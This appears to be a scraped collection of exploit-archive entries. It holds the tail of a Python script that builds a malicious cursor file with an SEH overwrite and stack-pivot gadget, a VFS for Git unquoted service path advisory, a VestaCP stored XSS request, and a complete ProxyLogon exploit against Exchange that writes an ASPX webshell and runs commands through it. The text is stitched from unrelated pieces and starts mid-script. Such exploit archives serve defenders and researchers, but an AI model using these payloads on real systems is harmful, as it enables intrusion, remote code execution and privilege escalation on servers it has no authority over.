"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF1\x11\x11\xF0\x00\xF1\x11\x11\x10\xFF\xFF\xF0\x11\x11\x11\x11\xFF\x11\x11\xF0\x00\xF1\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\xF1\x1F\x00\x0F\x11\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\xF0\x0F\x1F\x00\x0F\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\xF0\x00\xF1\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\xFF\xFF\xFF\xF1\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\x0F\x11\x11\x10\xFF\xF0\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\xF1\x00\x00\x01\x0F\xFF\x01\x11\x11\x11\xF0\x00\x00\x00\x00\x0F\x11\x0F\xFF\x01\x10\xFF\xF0\x11\x11\x11\xF0\x00\x00\x00\x00\xF1\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\x0F\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\xF1\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00" # SEH record overwrite goes here cur_2ImageData2 = "\x00\xFF\xF0\x0F\xFF\xF0\x11\x11\x11\xF0\x00\x00\xF1\x11\x11\x11\x11\x0F\xFF\xFF\xFF\x01\x11\x11\x11\xF0\x00\x0F\x11\x11\x11\x11\x11\x10\x00\x00\x00\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x0F\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xFF\xFF\xFF\xC1\xFF\xFF\xFF\xC1\xFF\xFF\xFF\x83\xF8\xFF\xFF\x83\xF0\x7F\xDF\x07\xE0\x3F\xCF\x07\xF0\x7F\xC6\x0F\xF8\xFF\xC2\x0F\xF0\x7F\xC0\x1F\xF0\x7F\xC0\x00\x70\x7F\xC0\x00\xF8\x3F\xC0\x01\x04\x1F\xC0\x03\x06\x0F\xC0\x07\x06\x07\xC0\x0F\x06\x07\xC0\x1F\x06\x07\xC0\x3F\x80\x0F\xC0\x7F\xC0\x1F\xC0\xFF\xE0\x3F\xC1\xFF\xFF\xFF\xC3\xFF\xFF\xFF\xC7\xFF\xFF\xFF\xCF\xFF\xFF\xFF\xDF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" ################################################################################### buf = "" buf += cur_Signature buf += cur_Entries buf += cur_1InfoHeader buf += cur_1ImageData buf += cur_2InfoHeader buf += cur_2ImageData # buf += struct.pack('<I',0x004023da) # SEH pop ecx ; pop ebp ; ret | startnull {PAGE_EXECUTE_READ} [FSViewer.exe] # 0x0019dc10 : Pointer into normal cyclic pattern at ESP+0x588 (+1416) : 0x0019dc48 : offset 1, length 775 buf += struct.pack('<I',0x6adad2ff) # stack pivot 1560 / 0x618 : ADD ESP,608 ; POP EBX ; POP ESI ; POP EDI ; POP EBP ; RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ} buf += cur_2ImageData2 #buf += "B" * (buf_max_size - len(buf)) print("\nWriting CUR File:") print("--------------------------------------------------------") print("- Signature + ImageCount:\t{}".format(len(cur_Signature))) print("- Entries 2/2:\t\t\t{}".format(len(cur_Entries))) print("- 1st InfoHeader:\t\t{}".format(len(cur_1InfoHeader))) print("- 1st ImageData:\t\t{}".format(len(cur_1ImageData))) print("- 2nd InfoHeader:\t\t{}".format(len(cur_2InfoHeader))) print(" 2nd ImageData 1/2:\t{}".format(len(cur_2ImageData))) print(" SEH:\t\t\t4") print(" 2nd ImageData 2/2:\t{}".format(len(cur_2ImageData2))) print("- 2nd ImageData TOT:\t\t{}".format(len(cur_2ImageData)+4+len(cur_2ImageData2))) print("--------------------------------------------------------") print("[+] Writing total {} bytes on {}".format(len(buf), filename)) file = open(filename, "w"); file.write(buf); file.close();

# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path # Date: 2021-2-6 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://vfsforgit.org/ # Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe # Version: 1.0.21014.1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc GVFS.Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GVFS.Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GVFS.Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 # Tested on: VestaCP POST /add/ip/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 165 Cache-Control: max-age=0 Origin: https://TARGET:8083 Content-Type: application/x-www-form-urlencoded User-Agent: USER-AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://TARGET:8083/add/ip/ Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR; Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0 sec-gpc: 1 token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add

import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) if len(sys.argv) < 2: print("使用方式: python PoC.py <target> <email>") print("使用方式: python PoC.py mail.btwaf.cn [email protected]") exit() proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = sys.argv[1] email = sys.argv[2] random_name = id_generator(4) + ".js" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx" shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path # webshell-马子内容 shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>' autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email print("正在获取Exchange Server " + target+"权限") print("=============================") FQDN = "EXCHANGE01" ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False,proxies=proxies) if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: FQDN = ct.headers["X-FEServer"] ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, data=autoDiscoverBody, proxies=proxies, verify=False ) if ct.status_code != 200: print(ct.status_code) print("Autodiscover Error!") exit() if "<LegacyDN>" not in str(ct.content): print("Can not get LegacyDN!") exit() legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0] print("Got DN: " + legacyDn) mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "X-Requesttype": "Connect", "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}", "X-Clientapplication": "Outlook/15.0.4815.1002", "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456", "User-Agent": user_agent }, data=mapi_body, verify=False, proxies=proxies ) if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content): print("Mapi Error!") exit() sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0] print("Got SID: " + sid) sid = sid.replace(sid.split("-")[-1],"500") proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, data=proxyLogon_request, proxies=proxies, verify=False ) if ct.status_code != 241 or not "set-cookie" in ct.headers: print("Proxylogon Error!") exit() sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] print("Got session id: " + sess_id) print("Got canary: " + msExchEcpCanary) ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; ", "msExchLogonMailbox": "S-1-5-20", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False ) if ct.status_code != 200: print("GetOAB Error!") exit() oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0] print("Got OAB id: " + oabId) oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False ) if ct.status_code != 200: print("Set external url Error!") exit() reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "msExchLogonMailbox": "S-1-5-20", "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False ) if ct.status_code != 200: print("写入shell失败了啊") exit() print("成功了。马上就验证shell是否OK!") print("POST shell:https://"+target+"/owa/auth/test11.aspx") shell_url="https://"+target+"/owa/auth/test11.aspx" print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());') print("正在请求shell") data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False) if data.status_code != 200: print("写入shell失败") else: print("权限如下："+data.text.split("OAB (Default Web Site)")[0].replace("Name : ",""))